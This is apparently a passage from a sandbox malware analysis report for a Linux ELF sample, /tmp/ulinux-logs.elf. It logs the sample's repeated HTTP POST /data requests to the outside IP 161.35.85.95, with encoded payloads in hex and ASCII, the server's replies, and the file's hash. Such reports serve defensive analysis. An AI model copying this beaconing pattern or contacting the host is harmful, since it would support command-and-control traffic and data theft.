                                                          Data Ascii: NGVkMzQ2NWEtMGJkOS00NjVhLWIwYWItMTM4ODNiNTg1NGRhxuIho6Evx7Pw1rxsSin2pQDyVUKG65Juil2ISNLAH+WRMI6mqaWK50r/b2xoNtmV2k0lJ987TlVPUKQrJXsOPAKM/dVC6ufSHdaUR0B2c2dR7Gt/rEy8tCZuAJXvfpPRI5t0xa6St0fDpzPWvddkzaWjKWZR9uBFSojm28erGbA=
                                                          Mar 21, 2025 13:02:19.242772102 CET413OUTPOST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Data Raw: 4e 47 56 6b 4d 7a 51 32 4e 57 45 74 4d 47 4a 6b 4f 53 30 30 4e 6a 56 68 4c 57 49 77 59 57 49 74 4d 54 4d 34 4f 44 4e 69 4e 54 67 31 4e 47 52 68 78 75 49 68 6f 36 45 76 78 37 50 77 31 72 78 73 53 69 6e 32 70 51 44 79 56 55 4b 47 36 35 4a 75 69 6c 32 49 53 4e 4c 41 48 2b 57 52 4d 49 36 6d 71 61 57 4b 35 30 72 2f 62 32 78 6f 4e 74 6d 56 32 6b 30 6c 4a 39 38 37 54 6c 56 50 55 4b 51 72 4a 58 73 4f 50 41 4b 4d 2f 64 56 43 36 75 66 53 48 64 61 55 52 30 42 32 63 32 64 52 37 47 74 2f 72 45 79 38 74 43 5a 75 41 4a 58 76 66 70 50 52 49 35 74 30 78 61 36 53 74 30 66 44 70 7a 50 57 76 64 64 6b 7a 61 57 6a 4b 57 5a 52 39 75 42 46 53 6f 6a 6d 32 38 65 72 47 62 41 3d
                                                          Data Ascii: NGVkMzQ2NWEtMGJkOS00NjVhLWIwYWItMTM4ODNiNTg1NGRhxuIho6Evx7Pw1rxsSin2pQDyVUKG65Juil2ISNLAH+WRMI6mqaWK50r/b2xoNtmV2k0lJ987TlVPUKQrJXsOPAKM/dVC6ufSHdaUR0B2c2dR7Gt/rEy8tCZuAJXvfpPRI5t0xa6St0fDpzPWvddkzaWjKWZR9uBFSojm28erGbA=
                                                          Mar 21, 2025 13:02:19.754861116 CET413OUTPOST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Data Raw: 4e 47 56 6b 4d 7a 51 32 4e 57 45 74 4d 47 4a 6b 4f 53 30 30 4e 6a 56 68 4c 57 49 77 59 57 49 74 4d 54 4d 34 4f 44 4e 69 4e 54 67 31 4e 47 52 68 78 75 49 68 6f 36 45 76 78 37 50 77 31 72 78 73 53 69 6e 32 70 51 44 79 56 55 4b 47 36 35 4a 75 69 6c 32 49 53 4e 4c 41 48 2b 57 52 4d 49 36 6d 71 61 57 4b 35 30 72 2f 62 32 78 6f 4e 74 6d 56 32 6b 30 6c 4a 39 38 37 54 6c 56 50 55 4b 51 72 4a 58 73 4f 50 41 4b 4d 2f 64 56 43 36 75 66 53 48 64 61 55 52 30 42 32 63 32 64 52 37 47 74 2f 72 45 79 38 74 43 5a 75 41 4a 58 76 66 70 50 52 49 35 74 30 78 61 36 53 74 30 66 44 70 7a 50 57 76 64 64 6b 7a 61 57 6a 4b 57 5a 52 39 75 42 46 53 6f 6a 6d 32 38 65 72 47 62 41 3d
                                                          Data Ascii: NGVkMzQ2NWEtMGJkOS00NjVhLWIwYWItMTM4ODNiNTg1NGRhxuIho6Evx7Pw1rxsSin2pQDyVUKG65Juil2ISNLAH+WRMI6mqaWK50r/b2xoNtmV2k0lJ987TlVPUKQrJXsOPAKM/dVC6ufSHdaUR0B2c2dR7Gt/rEy8tCZuAJXvfpPRI5t0xa6St0fDpzPWvddkzaWjKWZR9uBFSojm28erGbA=
                                                          Mar 21, 2025 13:02:20.778734922 CET413OUTPOST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Data Raw: 4e 47 56 6b 4d 7a 51 32 4e 57 45 74 4d 47 4a 6b 4f 53 30 30 4e 6a 56 68 4c 57 49 77 59 57 49 74 4d 54 4d 34 4f 44 4e 69 4e 54 67 31 4e 47 52 68 78 75 49 68 6f 36 45 76 78 37 50 77 31 72 78 73 53 69 6e 32 70 51 44 79 56 55 4b 47 36 35 4a 75 69 6c 32 49 53 4e 4c 41 48 2b 57 52 4d 49 36 6d 71 61 57 4b 35 30 72 2f 62 32 78 6f 4e 74 6d 56 32 6b 30 6c 4a 39 38 37 54 6c 56 50 55 4b 51 72 4a 58 73 4f 50 41 4b 4d 2f 64 56 43 36 75 66 53 48 64 61 55 52 30 42 32 63 32 64 52 37 47 74 2f 72 45 79 38 74 43 5a 75 41 4a 58 76 66 70 50 52 49 35 74 30 78 61 36 53 74 30 66 44 70 7a 50 57 76 64 64 6b 7a 61 57 6a 4b 57 5a 52 39 75 42 46 53 6f 6a 6d 32 38 65 72 47 62 41 3d
                                                          Data Ascii: NGVkMzQ2NWEtMGJkOS00NjVhLWIwYWItMTM4ODNiNTg1NGRhxuIho6Evx7Pw1rxsSin2pQDyVUKG65Juil2ISNLAH+WRMI6mqaWK50r/b2xoNtmV2k0lJ987TlVPUKQrJXsOPAKM/dVC6ufSHdaUR0B2c2dR7Gt/rEy8tCZuAJXvfpPRI5t0xa6St0fDpzPWvddkzaWjKWZR9uBFSojm28erGbA=
                                                          Mar 21, 2025 13:02:20.930393934 CET457INHTTP/1.1 200 OK
                                                          Cache-Control: max-age=0, no-cache
                                                          Content-Length: 176
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Content-Type: application/octet-stream
                                                          Date: Fri, 21 Mar 2025 12:02:18 GMT
                                                          Pragma: no-cache
                                                          Server: NetDNA-cache/2.2
                                                          Connection: close
                                                          Data Raw: 4e 47 56 6b 4d 7a 51 32 4e 57 45 74 4d 47 4a 6b 4f 53 30 30 4e 6a 56 68 4c 57 49 77 59 57 49 74 4d 54 4d 34 4f 44 4e 69 4e 54 67 31 4e 47 52 68 64 6c 6f 52 34 37 75 41 77 6a 37 4b 47 4a 34 62 4c 78 32 51 4b 4b 6a 68 5a 4b 75 4d 75 35 4b 2f 4b 77 48 65 4a 73 2b 6d 76 53 45 52 6b 4b 48 50 72 66 77 63 79 56 6f 6d 34 4f 65 63 4d 69 67 48 44 46 4e 38 64 50 49 63 4f 70 66 75 47 6b 77 48 5a 2b 54 53 32 4d 58 78 53 33 6a 49 7a 61 55 32 55 37 6b 69 66 72 31 46 73 33 6d 62 45 69 48 43 68 67 6b 43 59 49 43 6e 62 64 76 6e 34 48 74 4a
                                                          Data Ascii: NGVkMzQ2NWEtMGJkOS00NjVhLWIwYWItMTM4ODNiNTg1NGRhdloR47uAwj7KGJ4bLx2QKKjhZKuMu5K/KwHeJs+mvSERkKHPrfwcyVom4OecMigHDFN8dPIcOpfuGkwHZ+TS2MXxS3jIzaU2U7kifr1Fs3mbEiHChgkCYICnbdvn4HtJ


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4192.168.2.2352638161.35.85.9580
                                                          TimestampBytes transferredDirectionData
                                                          Mar 21, 2025 13:02:36.113820076 CET413OUTPOST /data HTTP/1.1
                                                          Host: 161.35.85.95
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 220
                                                          Accept-Encoding: gzip
                                                          Connection: close
                                                          Data Raw: 4e 47 56 6b 4d 7a 51 32 4e 57 45 74 4d 47 4a 6b 4f 53 30 30 4e 6a 56 68 4c 57 49 77 59 57 49 74 4d 54 4d 34 4f 44 4e 69 4e 54 67 31 4e 47 52 68 4f 69 56 4e 58 53 52 71 68 51 59 4a 6b 30 39 6e 6e 47 66 63 41 65 51 2b 61 56 5a 50 75 52 6b 45 6b 51 44 7a 62 54 56 62 57 6b 50 41 51 36 57 59 45 48 76 6d 73 79 6a 32 49 78 7a 53 41 4f 2f 6e 73 76 4a 56 47 31 62 57 42 54 54 30 6b 63 37 57 45 57 6e 4c 79 30 5a 62 61 4f 31 63 7a 50 63 42 6a 6a 51 41 2b 52 76 4d 63 76 72 45 48 34 31 70 51 47 4a 33 6e 65 7a 6a 4c 6b 52 32 50 69 7a 69 38 50 6c 51 47 6b 36 41 49 69 78 33 70 57 6d 65 64 69 53 44 63 67 69 70 4a 47 67 2f 6c 51 59 75 73 54 51 75 61 50 73 79 77 41 30 3d
                                                          Data Ascii: NGVkMzQ2NWEtMGJkOS00NjVhLWIwYWItMTM4ODNiNTg1NGRhOiVNXSRqhQYJk09nnGfcAeQ+aVZPuRkEkQDzbTVbWkPAQ6WYEHvmsyj2IxzSAO/nsvJVG1bWBTT0kc7WEWnLy0ZbaO1czPcBjjQA+RvMcvrEH41pQGJ3nezjLkR2Pizi8PlQGk6AIix3pWmediSDcgipJGg/lQYusTQuaPsywA0=
                                                          Mar 21, 2025 13:02:36.289272070 CET457INHTTP/1.1 200 OK
                                                          Cache-Control: max-age=0, no-cache
                                                          Content-Length: 176
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Content-Type: application/octet-stream
                                                          Date: Fri, 21 Mar 2025 12:02:36 GMT
                                                          Pragma: no-cache
                                                          Server: NetDNA-cache/2.2
                                                          Connection: close
                                                          Data Raw: 4e 47 56 6b 4d 7a 51 32 4e 57 45 74 4d 47 4a 6b 4f 53 30 30 4e 6a 56 68 4c 57 49 77 59 57 49 74 4d 54 4d 34 4f 44 4e 69 4e 54 67 31 4e 47 52 68 64 47 72 38 55 33 76 31 66 4a 44 44 46 69 6d 70 33 50 4e 33 6c 43 6e 51 65 75 71 6d 48 56 31 4e 4a 67 63 6d 2f 64 65 68 6c 35 55 74 57 4a 46 45 41 71 68 64 53 6b 39 53 59 42 48 6c 63 4a 38 71 70 76 6f 4f 68 36 4c 72 68 6a 36 78 69 30 2f 4b 38 75 68 73 6e 6e 4b 6e 66 2b 2b 75 42 52 4a 6d 73 37 78 41 78 78 35 6d 55 59 31 49 54 38 78 61 54 44 33 37 66 42 53 42 34 4c 48 4a 58 37 44 6d
                                                          Data Ascii: NGVkMzQ2NWEtMGJkOS00NjVhLWIwYWItMTM4ODNiNTg1NGRhdGr8U3v1fJDDFimp3PN3lCnQeuqmHV1NJgcm/dehl5UtWJFEAqhdSk9SYBHlcJ8qpvoOh6Lrhj6xi0/K8uhsnnKnf++uBRJms7xAxx5mUY1IT8xaTD37fBSB4LHJX7Dm


                                                          System Behavior

                                                          Start time (UTC):12:02:00
                                                          Start date (UTC):21/03/2025
                                                          Path:/tmp/ulinux-logs.elf
                                                          Arguments:/tmp/ulinux-logs.elf
                                                          File size:8158184 bytes
                                                          MD5 hash:915d49a0a95eb7903709d871bb9a3dbe